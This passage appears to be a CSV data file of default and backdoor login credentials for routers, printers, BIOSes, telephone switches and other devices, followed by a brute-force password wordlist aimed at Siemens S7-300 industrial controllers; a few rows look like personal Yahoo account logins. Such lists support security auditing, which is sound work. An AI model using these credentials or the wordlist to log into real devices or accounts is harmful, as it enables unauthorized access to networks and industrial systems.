+unix,Generic,,Multi,webmaster,webmaster,User,, +unix,Generic,,Multi,www,,User,, +unix,Generic,,Multi,www,www,User,, +unix,Generic,,User,admin,admin,,, +unix,Generic,,User,administrator,,,, +unix,Generic,,User,administrator,administrator,,, +unix,Generic,,User,anon,anon,,, +unix,Generic,,User,bbs,,,, +unix,Generic,,User,bbs,bbs,,, +unix,Generic,,User,checkfs,checkfs,,, +unix,Generic,,User,checkfsys,checkfsys,,, +unix,Generic,,User,checksys,checksys,,, +unix,Generic,,User,daemon,,,, +unix,Generic,,User,daemon,daemon,,, +unix,Generic,,User,demo,,,, +unix,Generic,,User,demo,demo,,, +unix,Generic,,User,demos,,,, +unix,Generic,,User,demos,demos,,, +unix,Generic,,User,dni,,,, +unix,Generic,,User,dni,dni,,, +unix,Generic,,User,fal,,,, +unix,Generic,,User,fal,fal,,, +unix,Generic,,User,fax,,,, +unix,Generic,,User,fax,fax,,, +unix,Generic,,User,ftp,,,, +unix,Generic,,User,ftp,ftp,,, +unix,Generic,,User,games,,,, +unix,Generic,,User,games,games,,, +unix,Generic,,User,gopher,gopher,,, +unix,Generic,,User,gropher,,,, +unix,Generic,,User,guest,,,, +unix,Generic,,User,guest,guest,,, +unix,Generic,,User,guest,guestgue,,, +unix,Generic,,User,halt,,,, +unix,Generic,,User,halt,halt,,, +unix,Generic,,User,informix,informix,,, +unix,Generic,,User,lp,,,, +unix,Generic,,User,lp,bin,,, +unix,Generic,,User,lp,lineprin,,, +unix,Generic,,User,lp,lp,,, +unix,Generic,,User,lpadm,lpadm,,, +unix,Generic,,User,lpadmin,lpadmin,,, +unix,Generic,,User,lynx,,,, +unix,Generic,,User,lynx,lynx,,, +unix,Generic,,User,mail,,,, +unix,Generic,,User,mail,mail,,, +unix,Generic,,User,man,,,, +unix,Generic,,User,man,man,,, +unix,Generic,,User,me,,,, +unix,Generic,,User,me,me,,, +unix,Generic,,User,news,,,, +unix,Generic,,User,news,news,,, +unix,Generic,,User,nobody,,,, +unix,Generic,,User,nobody,nobody,,, +unix,Generic,,User,nuucp,,,, +unix,Generic,,User,operator,,,, +unix,Generic,,User,operator,operator,,, +unix,Generic,,User,oracle,,,, +unix,Generic,,User,postmaster,,,, +unix,Generic,,User,postmaster,postmast,,, +unix,Generic,,User,powerdown,powerdown,,, +unix,Generic,,User,rje,rje,,, +unix,Generic,,User,shu|own,,,, +unix,Generic,,User,shu|own,shu|own,,, +unix,Generic,,User,sync,,,, +unix,Generic,,User,sync,sync,,, +unix,Generic,,User,trouble,trouble,,, +unix,Generic,,User,umountfs,umountfs,,, +unix,Generic,,User,umountfsys,umountfsys,,, +unix,Generic,,User,umountsys,umountsys,,, +unix,Generic,,User,unix,unix,,, +unix,Generic,,User,user,user,,, +unix,Generic,,User,uucp,uucp,,, +unix,Generic,,User,uucpadm,uucpadm,,, +unix,Generic,,User,web,,,, +unix,Generic,,User,web,web,,, +unix,Generic,,User,webmaster,,,, +unix,Generic,,User,webmaster,webmaster,,, +unix,Generic,,User,www,,,, +unix,Generic,,User,www,www,,, +unix,Generic,HP-UX,Multi,root,hp,Admin,, +unix,Generic,early versions,console or telnet,root,gnomes,Admin,early backdoor password that likely is no longer in use anywhere except by nostalgic old-school admins running much newer systems, +unix,UNIX,,,setup,,,, +unix,Unix,,,service,smile,,, +unknown,POCSAG Radio Paging,,2.05,,password,,, +unknown,System 88,,,operator,operator,,, +unknown,System 88,,,overseer,overseer,,, +unknown,System 88,,,test,test,,, +us robotics,USR8000,,1.23 / 1.25,root,admin,,, +us robotics,USR8000,,Admin,root,admin,,, +us robotics,USR8550,,3.0.5,Any,12345,,, +usrobotics,805451,805451,,usr54321,usr54321,full,access, +usrobotics,ADSL Ethernet Modem,,HTTP,,12345,Admin,, +usrobotics,SureConnect 9003 ADSL Ethernet/USB Router,,Multi,root,12345,Admin,, +usrobotics,SureConnect 9105 ADSL 4-Port Router,,HTTP,admin,admin,Admin,, +usrobotics,SureConnect ADSL ,SureConnect ADSL ,Telnet,support,support,User,works after 3rd login trial, +usrobotics,TOTALswitch,,,,amber,,, +usrobotics,TOTALswitch,,,,amber,,Any, +usrobotics,USR5450,,,admin,,Admin,, +usrobotics,USR8000,1.23 / 1.25,Multi,root,admin,Admin,DSL-Router. Web-Login always uses user root, +usrobotics,USR8054 Router,,,admin,,,, +usrobotics,USR8550,,Any,Any,12345,,, +usrobotics,USR8550,3.0.5,Multi,Any,12345,Any,Best Modem, +usrobotics,adsl gateway wireless router,,wireless router,support,support,super user access,I find it on a manual, +utlexar,Telephone Switches,,,DESIGNED_BY_IC_KF,,Backdoor,, +utlexar,Telephone Switches,,,lexar,,maintenance default,, +utstar,UT300R,,Multi,admin,utstar,root,, +utstar,UT300R,,root,admin,utstar,,, +utstarcom,B-NAS B-RAS,,1000,dbase,dbase,,, +utstarcom,B-NAS B-RAS,,1000,field,field,,, +utstarcom,B-NAS B-RAS,,1000,guru,*3noguru,,, +utstarcom,B-NAS B-RAS,,1000,snmp,snmp,,, +utstarcom,B-NAS,B-RAS,1000,,dbase,dbase,, +utstarcom,B-NAS,B-RAS,1000,,field,field,, +utstarcom,B-NAS,B-RAS,1000,,guru,*3noguru,, +utstarcom,B-NAS,B-RAS,1000,,snmp,snmp,, +vasco,VACMAN Middleware,2.x,Multi,admin,,Admin,strong authentication server, +veenman,Linium C353,all versions,console and IP,,12345678,admin,, +vendor,Product,Revision,Protocol,User,Password,Access,Notes, +vendor,system,,verified,password,level,,, +vendor,system,,version,login,password,,, +veramark,eCAS,,Administrative,admin,password,,, +verifone,Verifone Junior,,,,166816,,, +verifone,Verifone Junior,,2.05,,166816,,, +verifone,Verifone Junior,2.05,,,166816,,, +verilink,NE6100-4 NetEngine,IAD 3.4.8,Telnet,,,Guest,, +veritas,Cluster Server,,,admin,password,,, +veritas,Cluster Server,,http,admin,password,Admin,, +verity,Ultraseek,,http,admin,admin,Admin,, +vertex,VERTEX 1501,,5.05,root,vertex25,,, +vertex,Vertex 1501,5.05,,root,vertex25,Admin,, +vextrec technology,PC BIOS,,,,Vextrex,,, +vextrectechnology,PC BIOS,,Console,,Vextrex,,, +vienuke,VieBoard,,2.6,admin,admin,,, +vienuke,VieBoard,2.6,,admin,admin,Administrator,, +vina technologies,ConnectReach,,,,,,, +vinatechnologies,ConnectReach,,,,,,3.6.2, +virtual programming,VP-ASP Shopping Cart,,5.0,admin,admin,,, +virtual programming,VP-ASP Shopping Cart,,5.0,vpasp,vpasp,,, +virtualprogramming,VP-ASP Shopping Cart,5.0,,admin,admin,Admin,, +virtualprogramming,VP-ASP Shopping Cart,5.0,,vpasp,vpasp,Admin,, +visa vap,VAP,,,root,QNX,,, +visa,Visa VAP,,Telnet/modem,root,QNX,root,, +visualnetworks,Visual Uptime T1 CSU/DSU,1,Console,admin,visual,Admin,, +vobis,PC BIOS,,,,merlin,,, +vobis,PC BIOS,,Console,,merlin,,, +voicegenietechnologies,VoiceGenie,,,pw,pw,Admin,, +vpasp,VP-ASP Shopping Cart,,,admin,admin,,, +vpasp,VP-ASP Shopping Cart,,,vpasp,vpasp,,, +vxworks,misc,,Multi,admin,admin,Admin,, +vxworks,misc,,Multi,guest,guest,Guest,, +waav,X2,,Admin,admin,waav,,, +wanadoo,Livebox,,Multi,admin,admin,Admin,, +wang,Wang,,Multi,CSG,SESAME,Admin,, +warracorp,janon,,guest,pepino,pepino,,, +warracorp,janon,2.1,HTTP,pepino,pepino,guest,, +watch guard,firebox 1000,,,admin,,,, +watch guard,firebox 1000,,Admin,admin,,,, +watchguard,FireBox,,,,wg,,, +watchguard,SOHO and SOHO6,all versions,FTP,user,pass,Admin,works only from the inside LAN, +watchguard,firebox 1000,,Multi,admin,,Admin,, +web wiz,Forums,,7.x,Administrator,letmein,,, +weblogic,weblogic,,yes,system,weblogic,,, +webmin,Webmin,,,admin,,,default linux install, +webmin,Webmin,,,admin,hp.com,,, +webmin,Webmin,,http,admin,hp.com,Admin,, +webramp,410i etc...,,,wradmin,trancell,,, +webramp,Unknown,,,wradmin,trancell,,, +webwiz,Forums,7.x,http,Administrator,letmein,Admin,, +westell,2200,,Multi,admin,password,Admin,, +westell,Versalink 2200,,,admin,password,,, +westell,Versalink 327,,,admin,password,,, +westell,Versalink 327,,Multi,admin,,Admin,, +westell,Versalink 6100,,,admin,password,,, +westell,Wang,,Multi,CSG,SESAME,Admin,, +westell,Wirespeed wireless router,,Multi,admin,sysAdmin,Admin,, +westell,Wirespeed,,Multi,admin,password,Admin,, +westell,Wirespeed,,Multi,admin,sysAdmin,Admin,, +wim bervoets,WIMBIOSnbsp BIOS,,,,Compleri,,, +wim bervoets,WIMBIOSnbsp BIOS,,Admin,,Compleri,,, +wimbervoets,WIMBIOSnbsp BIOS,,Console,,Compleri,Admin,, +winwork,iso sistemi,,,operator,,,, +winwork,iso sistemi,,Admin,operator,,,, +wireless inc.,WaveNet,,,root,rootpass,,, +wirelessinc,WaveNet 2458,,,root,rootpass,,, +worldclient,AdminServer,,,WebAdmin,Admin,,, +worldclient,AdminServer,,HTTP:2001,WebAdmin,Admin,WorldClient,, +worldclient,AdminServer,,WorldClient,WebAdmin,Admin,,, +www.soft.vip600.com,123,,,anonymous,anonymous,,, +wwwboard,WWWADMIN.PL,,,WebAdmin,WebBoard,,, +wwwboard,WWWADMIN.PL,,Admin,WebAdmin,WebBoard,,, +wwwboard,WWWADMIN.PL,,HTTP,WebAdmin,WebBoard,Admin,, +wyse,V90 series thin client,all,BIOS,,Fireport,BIOS,, +wyse,V90,,VNC,,Wyse,,, +wyse,WT 1125 SE,,,user,user,,, +wyse,WT9235LE,XPe (XP embedded),console login,Administrator,Administrator,local Admin,(case sensitive), +wyse,Winterm 3150,,VNC,,password,Admin,, +wyse,Winterm,,5440XL,VNC,winterm,,, +wyse,Winterm,,5440XL,root,wyse,,, +wyse,Winterm,,Admin,root,wyse,,, +wyse,Winterm,,VNC,VNC,winterm,,, +wyse,Winterm,5440XL,Console,root,wyse,Admin,, +wyse,Winterm,5440XL,VNC,VNC,winterm,VNC,, +wyse,Winterm,9455XL,BIOS,,Fireport,BIOS,Case Sensitive, +wyse,rapport,4.4,FTP,rapport,r@p8p0r+,ftp logon to controlling ftp server.,, +wyse,v90le,unknown,console,Administrator,Administrator,,, +wyse,winterm,,Multi,root,,Admin,, +x-micro,WLAN 11b Broadband Router,,,1502,1502,,, +x-micro,WLAN 11b Broadband Router,,,super,super,,, +xavi,7000-ABA-ST1,,Console,,,Admin,, +xavi,7001,,Console,,,Admin,, +xavi,X7722r,,192.168.1.1,admin,admin,,, +xavi,X7722r,all,HTTP,admin,admin,192.168.1.1,, +xerox,61xx,All,DocuSP,Administrator,administ,,, +xerox,7232,,,11111,x-admin,,, +xerox,77xx,,http,admin,1111,,, +xerox,ApeosIII 4300,,HTTP,11111,x-admin,Admin,, +xerox,DocuCentre-II C6500,all versions,http,11111,x-admin,Admin,source http://www.support.xerox.com/SRVS/CGI-BIN/WEBCGI.EXE/, +xerox,DocuColor 1632,,console,,11111,Admin,, +xerox,DocuColor 1632,,http,admin,admin,Admin,, +xerox,DocuColor,,1632,,11111,,, +xerox,DocuColor,,1632,admin,admin,,, +xerox,Document Centre 405,-,HTTP,admin,admin,Admin,, +xerox,Document Centre 425,,HTTP,admin,,Admin,, +xerox,Document Centre 425,,HTTP,admin,22222,Admin,works for access panel 2, +xerox,Document Centre 432,,,admin,22222,,, +xerox,Document Centre 432,,http,admin,22222,Admin,, +xerox,Document Centre c320,,HTTP,admin,admin,,Default machine admin password: 11111, +xerox,Fiery,,,Administrator,Fiery.1,,, +xerox,Fiery,,HTTP,Administrator,Fiery.1,,, +xerox,Fiery,2.0,remove desktop,Administrator,fiery.1,,, +xerox,Multi Function Equipment,,,admin,2222,,, +xerox,Multi Function Equipment,,Admin,admin,2222,,, +xerox,Multi Function Equipment,,Multi,admin,2222,Admin,combo fax/scanner/printer with network access, +xerox,Phaser 3600,,,admin,1111,,, +xerox,Work Center Pro C2128,,http,admin,1111,,, +xerox,WorkCenter 2640,,http://,admin,1111,,, +xerox,WorkCenter Pro 428,,,admin,admin,,, +xerox,WorkCenter Pro 428,,Admin,admin,admin,,, +xerox,WorkCentre 265,v1,http,admin,1111,,, +xerox,WorkCentre 5230,all,web,11111,x-admin,,, +xerox,WorkCentre 5675,All,Console, HTTP,admin,1111,, +xerox,WorkCentre 57xx,,http,admin,1111,,, +xerox,WorkCentre 7245,,http,11111,x-admin,Admin,, +xerox,WorkCentre 7328,,http,11111,x-admin,,, +xerox,WorkCentre 7335,,,11111,x-admin,,, +xerox,WorkCentre 7345,,,11111,x-admin,,, +xerox,WorkCentre 7425,,http or console,admin,1111,,, +xerox,WorkCentre 7665,,,admin,1111,,, +xerox,WorkCentre M118,,shared 'admintool' folder,admin,x-admin,admin,\192.168.0.1admintool, +xerox,WorkCentre M20i,,http,admin,1111,Admin,, +xerox,WorkCentre PE 120i,,IP address,admin,1111,,, +xerox,WorkCentre Pro 35,,HTTP,admin,1111,Admin,, +xerox,WorkCentre Pro 420,,,admin,sysadm,,, +xerox,WorkCentre Pro 428,,HTTP,admin,admin,Admin,, +xerox,WorkCentre Pro 45,,HTTP,admin,1111,Admin,, +xerox,WorkCentre Pro,,45,admin,1111,,, +xerox,WorkCentre and DocumentCentre,,,savelogs,crash,,, +xerox,WorkCentre,7232/7242,http,11111,x-admin,Administrator,, +xerox,WorkCentre/DocumentCentre,,,savelogs,crash,,, +xerox,Workcenter 245 Pro,,HTTP,admin,1111,,, +xerox,Workcentre 7120,All,Http,admin,1111,Admin,, +xerox,xerox,,Multi,,admin,Admin,, +xerox,xerox,,Multi,admin,admin,Admin,, +xincom,XC-DPG402,,http://192.168.1.1,admin,,Administration,, +xincom,XC-DPG502,,http://192.168.1.1,admin,,Administration,, +xincom,XC-DPG503,,http://192.168.1.1,admin,,Administration,, +xincom,XC-DPG602,,http://192.168.1.1,admin,,Administration,, +xincom,XC-DPG603,,http://192.168.1.1,admin,,Administration,, +xmicro,WLAN 11b Access Point,1.2.2,Multi,super,super,Admin,, +xmicro,X-Micro WLAN 11b Broadband Router,1.2.2 1.2.2.3 1.2.2.4 1.6.0.0,Multi,super,super,Admin,From BUGTRAQ, +xmicro,X-Micro WLAN 11b Broadband Router,1.6.0.1,HTTP,1502,1502,Admin,From BUGTRAQ, +xylan,Omnistack 1032CF,,,admin,password,,3.2.8, +xylan,Omnistack 4024,,,admin,password,,3.4.9, +xylan,Omniswitch,,,admin,switch,,, +xylan,Omniswitch,,,admin,switch,,3.1.8, +xylan,Omniswitch,,,diag,switch,,, +xylan,Omniswitch,,Admin,admin,switch,,, +xylan,Omniswitch,,Telnet,admin,switch,Admin,, +xylan,Omniswitch,,Telnet,diag,switch,Admin,, +xyplex,Routers,,,,system,,, +xyplex,Routers,,Admin,,system,,, +xyplex,Routers,,Port 7000,,access,User,, +xyplex,Routers,,Port 7000,,system,Admin,, +xyplex,Routers,,User,,access,,, +xyplex,Terminal Server,,,,access,,, +xyplex,Terminal Server,,,,system,,, +xyplex,Terminal Server,,Admin,,system,,, +xyplex,Terminal Server,,Port 7000,,access,User,, +xyplex,Terminal Server,,Port 7000,,system,Admin,, +xyplex,Terminal Server,,User,,access,,, +xyplex,mx-16xx,,,setpriv,system,,, +xyplex,switch,3.2,Console,,,Admin,, +yahoo,mail,yes,Multi,1234567890,bloggs,yes,, +yahoo,messenger,messenger,Multi,handsome_123_handsome,plsdontguess,password,, +yahoo,messenger,messenger,Multi,intelligent_guy_priyank,passwordguy,password,, +yakumo,Routers,,HTTP,admin,admin,Admin,, +yuxin,YWH10 IP Phone,,http,User,1234,Admin,, +yuxin,YWH10 IP Phone,,http,User,19750407,Admin,, +yuxin,YWH100 IP Phone,,http,User,1234,Admin,, +yuxin,YWH100 IP Phone,,http,User,19750407,Admin,, +yuxin,YWH200 IP Phone,,http,User,1234,Admin,, +yuxin,YWH200 IP Phone,,http,User,19750407,Admin,, +yuxin,YWH300 IP Phone,,http,User,1234,Admin,, +yuxin,YWH300 IP Phone,,http,User,19750407,Admin,, +zcom,Wireless,,SNMP,root,admin,Admin,, +zcom,XG1021 N,,,admin,password,,, +zebra,10/100 Print Server,,Multi,admin,1234,Admin,, +zenith,PC BIOS,,,,3098z,,, +zenith,PC BIOS,,,,Zenith,,, +zenith,PC BIOS,,Admin,,3098z,,, +zenith,PC BIOS,,Admin,,Zenith,,, +zenith,PC BIOS,,Console,,3098z,Admin,, +zenith,PC BIOS,,Console,,Zenith,Admin,, +zeos,PC BIOS,,,,zeosx,,, +zeos,PC BIOS,,Admin,,zeosx,,, +zeos,PC BIOS,,Console,,zeosx,Admin,, +zeus,Zeus Admin Server,,4.1r2,admin,,,, +zeus,Zeus Admin Server,4.1r2,http,admin,,,, +zoom,ADSL X3,,,admin,zoomadsl,,, +zoom,ADSL X3,,HTTP,admin,zoomadsl,,, +zoom,IG-4165,,http://192.168.123.254,,admin,Administration,, +zoom,ZOOM ADSL Modem,,Console,admin,zoomadsl,Admin,, +zyxel,641 ADSL,,,,1234,,, +zyxel,642R,,Admin,,1234,,, +zyxel,642R,,Telnet,,1234,Admin,, +zyxel,660,,,1234,1234,,, +zyxel,660R-61C,1.0,http://192.168.1.1/,mikucha,abadaifice,root,abadaifice, +zyxel,660R-61C,401373,http://192.168.1.1,admin,1234,Admin,abadaifice, +zyxel,ADSL routers,All ZyNOS Firmwares,Multi,admin,1234,Admin,this is default for dsl routers provided by the ISP firstmile.no, +zyxel,G-1000,,http://192.168.1.2,,1234,Administration,, +zyxel,G-2000 Plus,,http://192.168.1.1,,1234,Administration,, +zyxel,G-3000H,,http://192.168.1.2,,1234,Administration,, +zyxel,G-560,,http://192.168.1.2,,1234,Administration,, +zyxel,G-570S,,http://192.168.1.2,,1234,Administration,, +zyxel,Generic Routers,,,,1234,,, +zyxel,Generic Routers,,Admin,,1234,,, +zyxel,Generic Routers,,Telnet,,1234,Admin,, +zyxel,Generic,,Admin,Admin,atc456,,, +zyxel,ISDN Router Prestige 100IH,,,,1234,,, +zyxel,ISDN-Router Prestige 1000,,,,1234,,, +zyxel,P-320W,,,user11,@12345,,, +zyxel,P-330 W EE,4312,,admin,1234,,, +zyxel,P-623,,http://192.168.1.1,admin,1234,Administration,, +zyxel,P-645,,http://192.168.1.1,admin,1234,Administration,, +zyxel,P-650,,http://192.168.1.1,admin,1234,Administration,, +zyxel,P-660HW,,http://192.168.1.1,,1234,Administration,, +zyxel,P-660RU,,http://192.168.1.1,,1234,Administration,, +zyxel,P-660h-t1 v2,ALL VERSIONS ETC,192.168.1.1,,,,, +zyxel,P-794M,,http://192.168.1.1,admin,1234,Administration,, +zyxel,P-964APR,,http://192.168.1.1:8080,user,1234,Administration,, +zyxel,P-964CM,,http://192.168.1.1:8080,user,1234,Administration,, +zyxel,P-964CR,,http://192.168.1.1:8080,user,1234,Administration,, +zyxel,P-971M,,http://192.168.1001,webadmin,1234,Administration,, +zyxel,P-974,,,admin,1234,,, +zyxel,P861H,,Multi,admin,1234,Web + Telnet,, +zyxel,P861H,,Web + Telnet,admin,1234,,, +zyxel,Prestige ,660R-61C,,,1234,,, +zyxel,Prestige 100IH,,,,1234,,, +zyxel,Prestige 100IH,,Console,,1234,Admin,, +zyxel,Prestige 128 modem-router,,,,1234,,any, +zyxel,Prestige 300 series,,,,1234,,zynos 2.*, +zyxel,Prestige 643,,,,1234,,, +zyxel,Prestige 643,,Console,,1234,Admin,, +zyxel,Prestige 645,,HTTP,admin,1234,Admin,, +zyxel,Prestige 650,,Multi,1234,1234,Admin,, +zyxel,Prestige 652HW-31 ADSL Router,,,admin,1234,,, +zyxel,Prestige 652HW-31 ADSL Router,,HTTP,admin,1234,Admin,http://192.168.1.1, +zyxel,Prestige 652HW-31,,,admin,1234,,, +zyxel,Prestige 660HW,,Multi,admin,admin,Admin,, +zyxel,Prestige 900,,HTTP,webadmin,1234,Admin,192.168.1.1:8080, +zyxel,Prestige P660HW,,Multi,admin,1234,Admin,, +zyxel,Prestige,,,,1234,,, +zyxel,Prestige,,,root,1234,,, +zyxel,Prestige,,Admin,,1234,,, +zyxel,Prestige,,Admin,root,1234,,, +zyxel,Prestige,,FTP,root,1234,Admin,, +zyxel,Prestige,,HTTP,,1234,Admin,http://192.168.1.1, +zyxel,Prestige,,Telnet,,1234,Admin,, +zyxel,Switch,,Web/Telnet/CLI,admin,1234,,, +zyxel,Switch,ES-2108-G,Multi,admin,1234,Web/Telnet/CLI,, +zyxel,Windows Vista,P- 2602HWN-D7A,192.168.1.1.,anatoij,1234,1234,, +zyxel,ZyWALL Series Prestige 660R-61C,,Multi,,admin,Admin,, +zyxel,ZyWall 2,,HTTP,,,Admin,, +zyxel,Zywall,,Admin,admin,1234,,, +zyxel,Zywall,,Multi,admin,1234,Admin,, +zyxel,linux,4,http://192.168.1.1:8080,user,mr37net,root,-, +zyxel,p-660hw,t1,http://192.168.1.1,,,admin,, +zyxel,zyxer,cable moden,http:192.168.1.1:8080,webadmin,1234,user,desprogamado, +siemens s7-300,,,,,',,, +siemens s7-300,,,,,'',,, +siemens s7-300,,,,,''',,, +siemens s7-300,,,,,'''',,, +siemens s7-300,,,,,''''',,, +siemens s7-300,,,,,'''''',,, +siemens s7-300,,,,,''''''',,, +siemens s7-300,,,,,'''''''',,, +siemens s7-300,,,,,-,,, +siemens s7-300,,,,,--,,, +siemens s7-300,,,,,---,,, +siemens s7-300,,,,,----,,, +siemens s7-300,,,,,-----,,, +siemens s7-300,,,,,------,,, +siemens s7-300,,,,,-------,,, +siemens s7-300,,,,,--------,,, +siemens s7-300,,,,,!manage,,, +siemens s7-300,,,,,!MANAGE,,, +siemens s7-300,,,,,$secure$,,, +siemens s7-300,,,,,*,,, +siemens s7-300,,,,,**,,, +siemens s7-300,,,,,***,,, +siemens s7-300,,,,,****,,, +siemens s7-300,,,,,*****,,, +siemens s7-300,,,,,******,,, +siemens s7-300,,,,,*******,,, +siemens s7-300,,,,,********,,, +siemens s7-300,,,,,,,,, +siemens s7-300,,,,,,,,,, +siemens s7-300,,,,,,,,,,, +siemens s7-300,,,,,,,,,,,, +siemens s7-300,,,,,,,,,,,,, +siemens s7-300,,,,,,,,,,,,,, +siemens s7-300,,,,,,,,,,,,,,, +siemens s7-300,,,,,,,,,,,,,,,, +siemens s7-300,,,,,.,,, +siemens s7-300,,,,,..,,, +siemens s7-300,,,,,...,,, +siemens s7-300,,,,,....,,, +siemens s7-300,,,,,.....,,, +siemens s7-300,,,,,......,,, +siemens s7-300,,,,,.......,,, +siemens s7-300,,,,,........,,, +siemens s7-300,,,,,/,,, +siemens s7-300,,,,,//,,, +siemens s7-300,,,,,///,,, +siemens s7-300,,,,,////,,, +siemens s7-300,,,,,/////,,, +siemens s7-300,,,,,//////,,, +siemens s7-300,,,,,///////,,, +siemens s7-300,,,,,////////,,, +siemens s7-300,,,,,;,,, +siemens s7-300,,,,,;;,,, +siemens s7-300,,,,,;;;,,, +siemens s7-300,,,,,;;;;,,, +siemens s7-300,,,,,;;;;;,,, +siemens s7-300,,,,,;;;;;;,,, +siemens s7-300,,,,,;;;;;;;,,, +siemens s7-300,,,,,;;;;;;;;,,, +siemens s7-300,,,,,@#$123,,, +siemens s7-300,,,,,[,,, +siemens s7-300,,,,,[[,,, +siemens s7-300,,,,,[[[,,, +siemens s7-300,,,,,[[[[,,, +siemens s7-300,,,,,[[[[[,,, +siemens s7-300,,,,,[[[[[[,,, +siemens s7-300,,,,,[[[[[[[,,, +siemens s7-300,,,,,[[[[[[[[,,, +siemens s7-300,,,,,],,, +siemens s7-300,,,,,]],,, +siemens s7-300,,,,,]]],,, +siemens s7-300,,,,,]]]],,, +siemens s7-300,,,,,]]]]],,, +siemens s7-300,,,,,]]]]]],,, +siemens s7-300,,,,,]]]]]]],,, +siemens s7-300,,,,,]]]]]]]],,, +siemens s7-300,,,,,_Cisco,,, +siemens s7-300,,,,,`,,, +siemens s7-300,,,,,``,,, +siemens s7-300,,,,,```,,, +siemens s7-300,,,,,````,,, +siemens s7-300,,,,,`````,,, +siemens s7-300,,,,,``````,,, +siemens s7-300,,,,,```````,,, +siemens s7-300,,,,,````````,,, +siemens s7-300,,,,,+,,, +siemens s7-300,,,,,++,,, +siemens s7-300,,,,,+++,,, +siemens s7-300,,,,,++++,,, +siemens s7-300,,,,,+++++,,, +siemens s7-300,,,,,++++++,,, +siemens s7-300,,,,,+++++++,,, +siemens s7-300,,,,,++++++++,,, +siemens s7-300,,,,,=,,, +siemens s7-300,,,,,==,,, +siemens s7-300,,,,,===,,, +siemens s7-300,,,,,====,,, +siemens s7-300,,,,,=====,,, +siemens s7-300,,,,,======,,, +siemens s7-300,,,,,=======,,, +siemens s7-300,,,,,========,,, +siemens s7-300,,,,,0,,, +siemens s7-300,,,,,00,,, +siemens s7-300,,,,,000,,, +siemens s7-300,,,,,0000,,, +siemens s7-300,,,,,00000,,, +siemens s7-300,,,,,000000,,, +siemens s7-300,,,,,0000000,,, +siemens s7-300,,,,,00000000,,, +siemens s7-300,,,,,00000001,,, +siemens s7-300,,,,,0000001,,, +siemens s7-300,,,,,000001,,, +siemens s7-300,,,,,00001,,, +siemens s7-300,,,,,0001,,, +siemens s7-300,,,,,001,,, +siemens s7-300,,,,,050952,,, +siemens s7-300,,,,,0P3N,,, +siemens s7-300,,,,,1,,, +siemens s7-300,,,,,100,,, +siemens s7-300,,,,,1000,,, +siemens s7-300,,,,,10000,,, +siemens s7-300,,,,,100000,,, +siemens s7-300,,,,,1000000,,, +siemens s7-300,,,,,10000000,,, +siemens s7-300,,,,,10041979,,, +siemens s7-300,,,,,1064,,, +siemens s7-300,,,,,11,,, +siemens s7-300,,,,,111,,, +siemens s7-300,,,,,1111,,, +siemens s7-300,,,,,11111,,, +siemens s7-300,,,,,111111,,, +siemens s7-300,,,,,1111111,,, +siemens s7-300,,,,,11111111,,, +siemens s7-300,,,,,11112222,,, +siemens s7-300,,,,,112233,,, +siemens s7-300,,,,,11223344,,, +siemens s7-300,,,,,123,,, +siemens s7-300,,,,,123123,,, +siemens s7-300,,,,,12314500,,, +siemens s7-300,,,,,123321,,, +siemens s7-300,,,,,1234,,, +siemens s7-300,,,,,12344321,,, +siemens s7-300,,,,,12345,,, +siemens s7-300,,,,,123456,,, +siemens s7-300,,,,,1234567,,, +siemens s7-300,,,,,12345678,,, +siemens s7-300,,,,,12348765,,, +siemens s7-300,,,,,123654,,, +siemens s7-300,,,,,123asd,,, +siemens s7-300,,,,,123ASD,,, +siemens s7-300,,,,,123qwe,,, +siemens s7-300,,,,,123QWE,,, +siemens s7-300,,,,,1246,,, +siemens s7-300,,,,,128bit,,, +siemens s7-300,,,,,128BIT,,, +siemens s7-300,,,,,1313,,, +siemens s7-300,,,,,1502,,, +siemens s7-300,,,,,151298,,, +siemens s7-300,,,,,166816,,, +siemens s7-300,,,,,180497,,, +siemens s7-300,,,,,1890agb,,, +siemens s7-300,,,,,1890AGB,,, +siemens s7-300,,,,,1954,,, +siemens s7-300,,,,,1G2W3E,,, +siemens s7-300,,,,,1q2w3e,,, +siemens s7-300,,,,,2,,, +siemens s7-300,,,,,21,,, +siemens s7-300,,,,,21241036,,, +siemens s7-300,,,,,2128506,,, +siemens s7-300,,,,,22,,, +siemens s7-300,,,,,222,,, +siemens s7-300,,,,,2222,,, +siemens s7-300,,,,,22222,,, +siemens s7-300,,,,,222222,,, +siemens s7-300,,,,,2222222,,, +siemens s7-300,,,,,22222222,,, +siemens s7-300,,,,,266344,,, +siemens s7-300,,,,,281067,,, +siemens s7-300,,,,,281068,,, +siemens s7-300,,,,,2BW9,,, +siemens s7-300,,,,,2WSXcder,,, +siemens s7-300,,,,,3,,, +siemens s7-300,,,,,31994,,, +siemens s7-300,,,,,321,,, +siemens s7-300,,,,,33,,, +siemens s7-300,,,,,333,,, +siemens s7-300,,,,,3333,,, +siemens s7-300,,,,,33333,,, +siemens s7-300,,,,,333333,,, +siemens s7-300,,,,,3333333,,, +siemens s7-300,,,,,33333333,,, +siemens s7-300,,,,,3477,,, +siemens s7-300,,,,,355025,,, +siemens s7-300,,,,,3597,,, +siemens s7-300,,,,,3ascotel,,, +siemens s7-300,,,,,3ASCOTEL,,, +siemens s7-300,,,,,3ep5w2u,,, +siemens s7-300,,,,,3orro,,, +siemens s7-300,,,,,3ORRO,,, +siemens s7-300,,,,,3ware,,, +siemens s7-300,,,,,3WARE,,, +siemens s7-300,,,,,4,,, +siemens s7-300,,,,,42296795,,, +siemens s7-300,,,,,4321,,, +siemens s7-300,,,,,44,,, +siemens s7-300,,,,,444,,, +siemens s7-300,,,,,4444,,, +siemens s7-300,,,,,44444,,, +siemens s7-300,,,,,444444,,, +siemens s7-300,,,,,4444444,,, +siemens s7-300,,,,,44444444,,, +siemens s7-300,,,,,4ert,,, +siemens s7-300,,,,,4ERT,,, +siemens s7-300,,,,,4G5K,,, +siemens s7-300,,,,,4G7S,,, +siemens s7-300,,,,,4getme2,,, +siemens s7-300,,,,,4tas,,, +siemens s7-300,,,,,4TAS,,, +siemens s7-300,,,,,5,,, +siemens s7-300,,,,,5001,,, +siemens s7-300,,,,,5150,,, +siemens s7-300,,,,,5201314,,, +siemens s7-300,,,,,54321,,, +siemens s7-300,,,,,55,,, +siemens s7-300,,,,,55055,,, +siemens s7-300,,,,,555,,, +siemens s7-300,,,,,5555,,, +siemens s7-300,,,,,55555,,, +siemens s7-300,,,,,555555,,, +siemens s7-300,,,,,5555555,,, +siemens s7-300,,,,,55555555,,, +siemens s7-300,,,,,56789,,, +siemens s7-300,,,,,5693,,, +siemens s7-300,,,,,5777364,,, +siemens s7-300,,,,,5860,,, +siemens s7-300,,,,,589589,,, +siemens 